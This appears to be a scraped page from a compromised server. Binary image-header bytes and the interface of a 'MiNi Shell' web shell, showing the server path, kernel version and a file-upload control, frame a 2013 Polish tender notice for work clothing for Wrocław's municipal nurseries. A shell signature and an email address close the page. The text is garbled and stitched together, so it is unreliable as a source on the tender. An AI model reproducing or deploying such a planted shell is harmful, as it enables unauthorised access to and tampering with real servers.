JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130905/360292-N-2013.html

<p class="kh_header"><b>Wrocław: Dostawa odzieży roboczej i środków ochrony indywidualnej dla pracowników Wrocławskiego Zespołu Żłobków
Znak postępowania: ZP-38/WZŻ/2013</b><br>
<b>Numer ogłoszenia: 360292 - 2013; data zamieszczenia: 05.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławski Zespół Żłobków , ul. Fabryczna 15, 53-609 Wrocław, woj. dolnośląskie, tel. 71 358 46 46, faks 71 358 46 47.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży roboczej i środków ochrony indywidualnej dla pracowników Wrocławskiego Zespołu Żłobków
Znak postępowania: ZP-38/WZŻ/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odzieży roboczej i środków ochrony indywidualnej dla pracowników Wrocławskiego Zespołu Żłobków 
Szczegółowy opis przedmiotu zamówienia : 
1)Żakiet  z przodu i z tyłu cięcia pionowe lekko dopasowujące do sylwetki, z przodu dwie wpuszczone dolne kieszenie, góra żakietu wykończona w szpic, zapięcie pionowe na guziki; długość rękawów  do łokcia lub długie; żakiety wykonane z tkanin kolorowych (włącznie z białym), nieodkształcające się i nieodbarwiające się podczas prania, gramatura - 160-195 g m2, tkanina wykonana z przędzy bawełnianej z dodatkiem włókna syntetycznego w proporcji od 50% bawełna  50% włókno syntetyczne do 35% bawełna  65% włókno syntetyczne; możliwość prania w 60 stopniach Celsjusza (w 95 stopniach Celsjusza dla odzieży przeznaczonej dla pracowników kuchni); RYSUNEK NR 1; żłobek nr 1- 25 szt.; żłobek nr 2- 36 szt. ; żłobek nr 3- 34 szt. ; żłobek nr 4- 41 szt.;  żłobek nr 5- 37 szt.; żłobek nr 7- 36 szt.; żłobek nr 8- 42szt.; żłobek nr 9- 14 szt.; żłobek nr 10- 28 szt.; żłobek nr 11- 23 szt.; żłobek nr 12- 6 szt.; żłobek nr 13- 22szt.; żłobek nr 14- 54 szt.; żłobek nr 15-  59 szt; odzież dla osób na etat zastępstwo(zamawiana według rzeczywistych potrzeb Zamawiającego) - 10 szt.; razem ilość żakietów: 467 szt.
2)Koszulka bawełniana  typu T shirt, z krótkim rękawem delikatnie taliowany, dekolt  w łódkę; wykonana ze 100% bawełny (dopuszczalna domieszka 5% elastycznego włókna syntetycznego) o gramaturze 150-210 g m2, materiał miły w dotyku, przewiewny, wytrzymały, wzmocnienia mankietów przy rękawach i biodrach; możliwość prania w co najmniej 40 stopniach Celsjusza; niedopuszczalne odkształcenie deformacja na szwach po praniu; żłobek nr 1-  50 szt.; żłobek nr 2- 12 szt.; żłobek nr 3- 8 szt.; żłobek nr 4 - 2szt.; żłobek nr 5- 10 szt.; żłobek nr 7- 16 szt.; żłobek nr 9- 22szt.; żłobek nr 11- 26 szt.; żłobek nr 13- 44 szt.; żłobek nr 14- 22 szt.; żłobek nr 15- 58 szt.; razem ilość koszulek bawełnianych: 270 szt.
3)Spodnie  z paskiem i zapięciem na zamek błyskawiczny z przodu i guzik, po bokach gumki dopasowujące spodnie w talii, lekko rozkloszowane lub proste u dołu, z tyłu i z przodu po dwie zaszewki, bez kieszeni, u dołu nogawek rozcięcia, spodnie z wysokim stanem (niedopuszczalne tzw. biodrówki); spodnie wykonane z tkanin kolorowych (włącznie z białym), nieodkształcające się i nieodbarwiające się podczas prania, gramatura - 195-235 g m2, tkanina wykonana z przędzy bawełnianej z dodatkiem włókna syntetycznego w proporcji od 50% bawełna  50% włókno syntetyczne do 35% bawełna 65% włókno syntetyczne; możliwość prania w 60 stopniach Celsjusza (w 95 stopniach Celsjusza dla odzieży przeznaczonej dla pracowników kuchni); RYSUNEK NR 2; żłobek nr 1- 12 par; żłobek nr 3- 26 par; żłobek nr 4- 28 par; żłobek nr 5 -36 par; żłobek nr 7- 35 par; żłobek nr 8- 33 pary; żłobek nr 9- 14 par; żłobek nr 10- 25 par; żłobek nr 11- 36 par; żłobek nr 12- 6 par; żłobek nr 13- 34 pary; żłobek nr 14 -64 pary; żłobek nr 15 - 83 pary; odzież dla osób na zastępstwo (zamawiana według rzeczywistych potrzeb Zamawiającego)-  10 szt.; razem ilość spodni: 442 pary.
4)Spodnie ?  z paskiem i zapięciem na zamek błyskawiczny z przodu i guzik, po bokach gumki dopasowujące spodnie w talii, lekko rozkloszowane lub proste u dołu, z tyłu i z przodu po dwie zaszewki, bez kieszeni; spodnie ?  wykonane z tkanin kolorowych (włącznie z białym), nieodkształcające się i nieodbarwiające się podczas prania, gramatura - 195-235 g m2, tkanina wykonana z przędzy bawełnianej z dodatkiem włókna syntetycznego w proporcji od 50% bawełna  50% włókno syntetyczne do 35% bawełna  65% włókno syntetyczne; możliwość prania w 60 stopniach Celsjusza (w 95 stopniach Celsjusza dla odzieży przeznaczonej dla pracowników kuchni); RYSUNEK NR 3; żłobek nr 1- 12 par; żłobek nr 2- 42 pary; żłobek nr 3- 12 par; żłobek nr 4- 14 par; żłobek nr 5- 6 par; żłobek nr 8- 6 par; żłobek nr 9- 6 par; żłobek nr 13- 9 par; żłobek nr 15- 4 pary; razem ilość spodni ? -111 par.
5)Spódnica klasyczna  zapięcie z tyłu na zamek błyskawiczny, po bokach  gumki dopasowujące spódnice w talii, po dwie zaszewki z przodu i z tyłu, długość - do pół kolana, rozcięcie z tyłu; spódnica wykonana z tkanin kolorowych (włącznie z białym), nieodkształcająca się i nieodbarwiająca się podczas prania, gramatura - 195-235 g m2, tkanina wykonana z przędzy bawełnianej z dodatkiem włókna syntetycznego w proporcji od 50% bawełna 50% włókno syntetyczne do 35% bawełna 65% włókno syntetyczne; możliwość prania w 60 stopniach Celsjusza (w 95 stopniach Celsjusza dla odzieży przeznaczonej dla pracowników kuchni); RYSUNEK NR 4; żłobek nr 1 26 szt.; żłobek nr 7 9 szt.; żłobek nr 8 3szt.; żłobek nr 9 5szt.; żłobek nr 10 3szt. ; żłobek nr 13 2 szt.; żłobek nr 14 1szt. ; żłobek nr 15 1szt; razem ilość spódnic 50 szt.
6)Fartuch ochronny  uniwersalny o dł. 70-75 cm, szer. około 70 cm; z szelkami na szyję oraz parą wiązań o dł. 70 cm z tyłu; kieszonka na wysokości klatki piersiowej; fartuch wykonany z tkaniny w kolorze białym, nie odkształcający się podczas prania, gramatura - 195-235 g m2, tkanina wykonana z przędzy bawełnianej z dodatkiem włókna syntetycznego w proporcji od 50% bawełna  50% włókno syntetyczne do 35% bawełna  65% włókno syntetyczne; tkanina nadająca się do prania w 95 stopniach Celsjusza; żłobek nr 1- 4 szt.; żłobek nr 2- 3 szt.; żłobek nr 3- 3 szt.; żłobek nr 4- 3szt.; żłobek nr 5- 3szt.; żłobek nr 6- 3szt.; żłobek nr 7- 3szt.; żłobek nr 8- 2szt.; żłobek nr. 9- 2szt. ; żłobek nr 10- 4szt.;żłobek nr 11- 3szt.; żłobek nr 12- 10 szt., żłobek nr 13- 3szt.; żłobek nr 14- 7 szt.; żłobek nr 15- 8 szt.; razem ilość fartuchów ochronnych- 61 szt.
7)Zapaska  średniej długości  około 60 cm lub długa  około 75 cm; zapaska wykonana z tkaniny w kolorze białym, nie odkształcająca się podczas prania, gramatura - 195-235 g m2, tkanina wykonana z przędzy bawełnianej z dodatkiem włókna syntetycznego w proporcji od 60% bawełna  40% włókno syntetyczne do 65% bawełna  35% włókno syntetyczne; tkanina nadająca się do prania w 95 stopniach Celsjusza; żłobek nr 1- 4szt.; żłobek nr 3- 1szt.; żłobek nr 5 - 5szt.; żłobek nr 7 - 4szt.; żłobek nr 8- 6 szt.; żłobek nr 9- 2szt.; żłobek nr 11- 10 szt.; żłobek nr 13- 5 szt.; żłobek nr 14- 7 szt. ;żłobek nr 15 -8 szt.; razem ilość zapasek - 52 szt.
8)Fartuch przedni podgumowany - biały dla pracowników kuchni, wykonany ze 100% PCV, zakładany na szyję z wiązaniem na paski z tyłu, wymiary - 75x100 cm; żłobek nr 2- 4 szt.; żłobek nr 3- 3szt.; żłobek nr 4- 4 szt.; żłobek nr 5- 5szt.; żłobek nr 8 - 6szt.; żłobek nr 9- 2 szt.; żłobek nr 10- 12szt.; żłobek nr 11- 4szt.; żłobek nr 13- 1szt.; żłobek nr 14- 15 szt.; żłobek nr 15- 8szt.; razem ilość fartuch przedni podgumowany- 64 szt.
9)Czepek ochronny - na głowę dla pracowników kuchni, kolor biały, otok i daszek wykonany z tkaniny (65% PES  35% BW,  gramatura 210-245 g m2), wierzchnia część czepka i woreczek na włosy z miękkiej siatki (100% PES); Zamawiający dopuszcza również model, w którym otok, daszek, wierzchnia część czepka są wykonane z tkaniny (65% PES 35% BW, gramatura 210-245 g m2) z siateczką (100% PES) jedynie na włosy; szerokość obwodu - regulowana gumką; rozmiar uniwersalny; żłobek nr 1- 12szt.; żłobek nr 2- 4 szt.; żłobek nr 3- 50 szt.; żłobek nr 4- 4szt.; żłobek nr 5- 4szt.; żłobek nr 7- 4 szt.; żłobek nr 8-12 szt.; żłobek nr 9- 2szt.; żłobek nr 11-10 szt.; żłobek nr 13- 18 szt.; żłobek nr 14- 20 szt.; żłobek nr 15- 8 szt.; razem ilość czepek ochronny: 148 szt.
10)Rękawice ochronne kuchenne - w kolorze ciemnym, w tym w kolorze czarnym, temperatura - do 230°C, długość min. 430 mm, zastosowanie - gastronomia, placówki zbiorowego żywienia, restauracje; żłobek nr 1- 2 pary; żłobek nr 5- 2pary; żłobek nr 6- 2pary; żłobek nr 8- 1para; żłobek nr 9- 1para; żłobek nr 10- 2pary; żłobek nr 11- 2 pary; żłobek nr 12- 4pary; żłobek nr14- 2pary; żłobek nr  15- 4 pary; razem ilość rękawic ochronnych kuchennych- 22 pary.
11)Rękawice ochronne do pracy w pomieszczeniu mroźno-chłodniczym - rękawice 5-palcowe, wykonane z niebieskiego lateksu, w części dłoniowej szorstkowanego, ocieplane trykotową wkładką; długość min. 30 cm, grubość min. 1,4 mm; dopuszczone do kontaktu z żywnością; żłobek nr 1-  1 para; żłobek nr 2- 1para;  żłobek nr 3- 1para; żłobek nr 4- 1 para, żłobek nr 5- 1para; żłobek nr 6- 1 para; żłobek nr 7- 1 para; żłobek nr 8 - 1para ; żłobek nr 10 - 1 para; żłobek nr 11- 1 para; żłobek nr 12- 1 para; żłobek nr 13- 1 para; żłobek nr 14- 1 para; żłobek nr 15- 1 para ; Dodatkowe pary zamawiane według rzeczywistych potrzeb Zamawiającego- 2 pary; razem rękawice ochronne do pracy w pomieszczeniu mroźniczo- chłodniczym 16 par.
12)Rękawice ochronne gumowe - dwukolorowe, wykonane z lateksu i kauczuku; mankiet sięgający do połowy przedramienia; wyściółka z flokowanej czystej bawełny; delikatna chropowata struktura na części chwytnej, zapewniająca dobrą przyczepność; administracja- 20 par, razem rękawice ochronne gumowe- 20 par.
Dostawy odzieży roboczej i środków ochrony indywidualnej dla pracowników Wrocławskiego Zespołu Żłobków odbywać się będą do następujących obiektów:
 Żłobek nr 1- ul. Lwowska 20, Wrocław,
 Żłobek nr 2- ul. Zemska 33, Wrocław,
 Żłobek nr 3- ul. Białowieska 27, Wrocław,
 Żłobek nr 4- ul. Kłodnicka 25, Wrocław,
 Żłobek nr 5- ul. Dokerska 5, Wrocław,
 Żłobek nr 6- ul. Krowia 1, Wrocław,
 Żłobek nr 7- ul. Drukarska 9, Wrocław,
Żłobek nr 8- ul. Sądowa 6, Wrocław,
Żłobek nr 9- ul. Wrońskiego 13 d, Wrocław,
Żłobek nr 10- ul. H. Brodatego 17, Wrocław,
 Żłobek nr 11- ul. Hubska 39, Wrocław,
Żłobek nr 12- ul. Jugosłowiańska 85 a, Wrocław,
Żłobek nr 13- ul. Wieczysta 107, Wrocław,
 Żłobek nr 14- ul. Mulicka 4c, Wrocław,
Żłobek nr 15- ul. Łukowa 37, Wrocław,
Administracja - ul. Fabryczna 15, Wrocław,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.10.00.00-0, 33.19.90.00-1, 18.42.40.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ).
 Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia umowy wymagają zachowania formy pisemnej w postaci aneksu do niniejszej umowy podpisanego przez obie Strony, pod rygorem nieważności. 
2.Zamawiający zastrzega sobie możliwość wprowadzenia zmian w wykazach adresowych
(dodanie lub odjęcie obiektu) oraz możliwość wprowadzenia zmian ilości odzieży i środków ochrony indywidualnej podanych w załączniku nr 2, które określają maksymalne potrzeby Zamawiającego w okresie obowiązywania umowy i w związku z tym Zamawiający zastrzega sobie możliwość niezrealizowania całości przedmiotu umowy w zakresie nie większym niż 7% bez jakichkolwiek roszczeń ze strony Wykonawcy z tego tytułu.
3.Zawarta umowa może ulec zmianie w przypadku okoliczności, których strony nie mogły przewidzieć, związanych z uwarunkowaniami technicznymi wykonania zamówienia oraz działania osób trzecich. Zmiana taka wymaga formy aneksu podpisywanego po zweryfikowaniu w/w okoliczności przez Zamawiającego.
4.Zmiana umowy może nastąpić w przypadku, gdy  przedmiot umowy nie będzie dostępny na rynku z powodu zaprzestania produkcji lub wycofania z rynku, pod warunkiem , że produkt zamienny będzie równoważny lub lepszy od wymaganego przez zamawiającego oraz cena nie przekroczy ceny ofertowej brutto w zakresie produktu, którego będzie dotyczyć zmiana.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzz.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wrocławski Zespół Żłobków
ul. Fabryczna 15, 53-609 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2013 godzina 10:00, miejsce: można składać osobiście we Wrocławskim Zespole  Żłobków
ul. Fabryczna 15, 53-609 Wrocław (Sekretariat) lub można przesłać pocztą do siedziby Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com